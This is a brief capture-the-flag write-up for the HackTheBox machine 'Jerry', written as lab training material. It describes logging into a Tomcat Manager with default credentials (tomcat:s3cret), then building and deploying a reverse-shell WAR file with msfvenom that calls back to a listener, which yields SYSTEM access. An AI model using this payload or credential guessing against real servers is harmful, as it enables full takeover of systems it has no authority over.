Hackthebox - Jerry
Windows
Nmap
We only have one port open
Port 8080
In the meantime we can try to log in on Manager. admin password or admin:admin does not work.
We get redirect here so I tried tomcat with a password of s3cret and it works
We can now try to upload things here
Let's make a malicious war file with msfvenom and upload it
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f war > shell.war
rlwrap nc -lvp 1234
we set up a listenerWe upload it and deploy it. We can see it here
We get a shell as authority system right away
If we go to the Administrator's Desktop we have the user and the root flag in the same file
And we are done. Shortest writeup ever I think 😆 😆
Last updated